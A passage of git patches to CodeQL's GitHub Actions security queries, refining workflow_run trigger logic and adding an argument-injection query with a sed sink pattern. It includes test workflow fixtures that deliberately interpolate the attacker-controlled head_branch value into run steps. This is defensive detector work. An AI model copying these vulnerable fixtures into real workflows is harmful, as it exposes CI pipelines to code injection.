+ // except for workflow_run which requires additional checks + externallyTriggerableEventsDataModel(this.getName()) and + not this.getName() = "workflow_run" + or + this.getName() = "workflow_run" and + // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch + // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // but in that case, the triggering workflow will run in the context of the PR head branch + ( + not exists(this.getAPropertyValue("branches")) or + not this.getAPropertyValue("branches") = defaultBranchNames() + ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 1a3e7b2b2f7c..29c0ed4feed0 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.config.Config +import codeql.actions.Helper string defaultBranchTriggerEvent() { result = @@ -11,16 +12,6 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = default_branch_name - ) - or - not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and - result = ["main", "master"] -} - predicate runsOnDefaultBranch(Event e) { ( e.getName() = defaultBranchTriggerEvent() and diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml new file mode 100644 index 000000000000..7920e649da80 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: ["main"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml new file mode 100644 index 000000000000..601ad558fa0c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: "main" + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml new file mode 100644 index 000000000000..833d655d3e59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml @@ -0,0 +1,12 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 6dfb91f72757..863fa67f116d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -388,3 +391,4 @@ subpaths | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 11036e7f8ebe..f2fd5923034f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -325,3 +328,5 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 090b3d41d165c3d3d2d2deef8e12592515748790 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:08:54 +0200 Subject: [PATCH 392/707] Fix branches logic --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- .../query-tests/Security/CWE-094/CodeInjectionCritical.expected | 2 ++ .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 3 files changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e2dfd6076df7..9416b39e1059 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -720,7 +720,7 @@ class EventImpl extends AstNodeImpl, TEventNode { // but in that case, the triggering workflow will run in the context of the PR head branch ( not exists(this.getAPropertyValue("branches")) or - not this.getAPropertyValue("branches") = defaultBranchNames() + this.getAPropertyValue("branches").matches("%*%") ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 863fa67f116d..3330ad89311f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -392,3 +393,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f2fd5923034f..e325205d8c89 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | From 621ead2266e45d147494872f02716597c23f6d8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:09:23 +0200 Subject: [PATCH 393/707] Fix branches logic --- .../.github/workflows/workflow_run_branches4.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml new file mode 100644 index 000000000000..8540c3ef2270 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: ["feat/**"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} From 73c77bc93bf1dd99093e229722b4a3808067a7cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 15:35:51 +0200 Subject: [PATCH 394/707] Initial implementation Pending work: complete the regular expression --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 71 +++++++++++------- .../security/ArgumentInjectionQuery.qll | 73 +++++++++++++++++++ .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 1 - .../CWE-094/ArgumentInjectionCritical.ql | 26 +++++++ .../CWE-094/ArgumentInjectionMedium.ql | 26 +++++++ .../Security/CWE-094/CodeInjectionCritical.ql | 1 - .../Security/CWE-094/CodeInjectionMedium.ql | 1 - .../.github/workflows/arg_injection.yml | 20 +++++ .../ArgumentInjectionCritical.expected | 8 ++ .../CWE-094/ArgumentInjectionCritical.qlref | 1 + .../CWE-094/ArgumentInjectionMedium.expected | 7 ++ .../CWE-094/ArgumentInjectionMedium.qlref | 1 + 14 files changed, 208 insertions(+), 32 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionCritical.ql create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 46c42da26521..ca0b7a70159d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. @@ -23,6 +24,42 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +bindingset[var_name, value] +predicate envToRunExpr(string var_name, Run run, string value) { + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. + // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) +} + +bindingset[var_name] +predicate envToArgInjSink(string var_name, Run run, string command) { + exists(string argument, string line, string regexp, int command_group, int argument_group | + run.getScript().splitAt("\n") = line and + argumentInjectionSinks(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + envToRunExpr(var_name, run, argument) and + exists(run.getInScopeEnvVarExpr(var_name)) + ) +} + /** * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH @@ -34,7 +71,7 @@ class AdditionalTaintStep extends Unit { * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` */ bindingset[var_name] -predicate envToRunFlow(string file, string var_name, Run run, string key) { +predicate envToSpecialFile(string file, string var_name, Run run, string key) { exists(string content, string value | ( file = "GITHUB_ENV" and @@ -50,30 +87,7 @@ predicate envToRunFlow(string file, string var_name, Run run, string key) { key = "path" and value = content ) and - ( - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | - run.getScript().splitAt("\n") = line - | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 - ) - ) - ) + envToRunExpr(var_name, run, value) ) } @@ -89,7 +103,10 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and - envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) + ( + envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToArgInjSink(var_name, run, _) + ) ) } @@ -110,7 +127,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var_name, string key | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll new file mode 100644 index 000000000000..be80cb3295d7 --- /dev/null +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -0,0 +1,73 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.FlowSteps +import codeql.actions.DataFlow + +abstract class ArgumentInjectionSink extends DataFlow::Node { + abstract string getCommand(); +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { + * ArgumentInjectionFromFileReadSink() { + * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + * this.asExpr() = run.getScriptScalar() and + * step.getAFollowingStep() = run and + * writeToGitHubEnv(run, content) and + * extractVariableAndValue(content, _, value) and + * outputsPartialFileContent(value) + * ) + * } + *} + */ +predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { + regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromEnvVarSink() { + exists(Run run, string var_name | + envToArgInjSink(var_name, run, command) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } + + override string getCommand() { result = command } +} + +class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { + ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + + override string getCommand() { result = "unknown" } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module ArgumentInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module ArgumentInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cbdf9a917ce9..e81c6954d72f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -36,7 +36,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_PATH", var_name, run, _) and + envToSpecialFile("GITHUB_PATH", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 5a3dbebc5123..869134215634 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -38,7 +38,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_ENV", var_name, run, _) and + envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f9274f54872d..07fc7c7af73d 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -46,7 +46,6 @@ extensions: - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] - ["rubocop"] - - ["sed\\s+-e"] - ["sed\\s+-f"] - ["stylelint"] - ["terraform"] diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql new file mode 100644 index 000000000000..e56f613fac4f --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql @@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/argument-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql new file mode 100644 index 000000000000..66c51ae36738 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql @@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/argument-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index f37c374658ae..9319718b7fc0 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 43f4eb9c38a2..0f8b6e13a290 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git 